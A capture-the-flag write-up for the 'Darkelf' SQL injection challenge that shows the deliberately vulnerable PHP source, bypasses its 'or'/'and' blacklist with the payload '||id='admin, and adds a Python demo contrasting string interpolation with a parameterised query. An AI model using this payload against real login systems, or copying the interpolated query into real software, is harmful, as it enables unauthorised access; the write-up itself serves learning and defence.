Darkelf

Operators "OR" and "AND" are disallowed

Code

<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");
  $query = "select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
  if($result['id'] == 'admin') solve("darkelf");
  highlight_file(__FILE__);
?>

Line 6: preg_match rejects the request if the substring 'or' or 'and' appears anywhere in the 'pw' parameter, matched case-insensitively.

Line 7: The query interpolates the user-supplied 'pw' value directly into the SQL string, with no escaping or parameter binding.

Line 11: The challenge is solved when the row returned by the query has an 'id' of 'admin'.

Query

SELECT id FROM prob_darkelf WHERE id='guest' AND pw=''

Testing

The vulnerable parameter is 'pw'.

In MySQL the operators OR and AND can alternatively be written as a double pipe || and a double ampersand &&, respectively, and neither form is caught by the filter. For this challenge only || is needed.

pw='||id=guest returns "Hello guest", which shows that the injected || clause is evaluated and the 'pw' check has been bypassed.

The challenge is then solved by replacing 'guest' with 'admin'.

pw='||id='admin returns "Hello admin".

Effective Query

SELECT id FROM prob_darkelf WHERE id='guest' AND pw=''||id='admin'

Because AND binds more tightly than OR, MySQL evaluates this as (id='guest' AND pw='') OR id='admin'; the first group is false and the second selects the admin row.
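As an added defender-side example (not part of the original writeup or the challenge's own code), the following Python script reproduces the challenge's two blacklist regexes, shows that string interpolation produces exactly the effective query above, and contrasts it with a parameterised lookup in which the same input is bound as a literal value. The table rows, passwords and the in-memory SQLite database are constructed for the demonstration.

```python
import re
import sqlite3

# Constructed sample rows for the demo; not the challenge's real table contents.
ROWS = [("guest", "guest_pw"), ("admin", "admin_pw")]


def is_blacklisted(pw: str) -> bool:
    """Reproduce the two preg_match filters from the challenge source.

    Both patterns are case-insensitive substring matches, so harmless values
    such as 'password' or 'order' are rejected, while '||' and '&&' pass.
    """
    if re.search(r"prob|_|\.|\(\)", pw, re.IGNORECASE):
        return True
    if re.search(r"or|and", pw, re.IGNORECASE):
        return True
    return False


def build_interpolated_query(pw: str) -> str:
    """String interpolation exactly as line 7 of the challenge does it.

    The caller's input becomes part of the SQL text, so quote characters and
    operators inside it change the structure of the statement.
    """
    return f"select id from prob_darkelf where id='guest' and pw='{pw}'"


def lookup_parameterized(pw: str):
    """Hardened lookup: the driver binds pw as a value, never as SQL text.

    Returns the matching id, or None when no row matches. Runs against an
    in-memory SQLite database so the example is fully offline.
    """
    conn = sqlite3.connect(":memory:")
    try:
        conn.execute("create table prob_darkelf (id text, pw text)")
        conn.executemany("insert into prob_darkelf values (?, ?)", ROWS)
        row = conn.execute(
            "select id from prob_darkelf where id='guest' and pw=?", (pw,)
        ).fetchone()
    finally:
        conn.close()
    return row[0] if row else None


if __name__ == "__main__":
    for candidate in ["' or id='admin", "'||id='admin", "password"]:
        print(f"{candidate!r:20} blacklisted={is_blacklisted(candidate)}")
    print(build_interpolated_query("'||id='admin"))
    print("parameterised lookup:", lookup_parameterized("'||id='admin"))
    print("parameterised lookup:", lookup_parameterized("guest_pw"))
```

The interpolated string is only built, not executed, because SQLite treats || as string concatenation rather than logical OR; the OR reading that the effective query relies on is MySQL behaviour (and even there it depends on the PIPES_AS_CONCAT SQL mode not being set). The parameterised lookup makes that dialect question irrelevant: the whole input is compared as a password string, so no row matches.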

Reference

https://dev.mysql.com/doc/refman/8.0/en/non-typed-operators.html
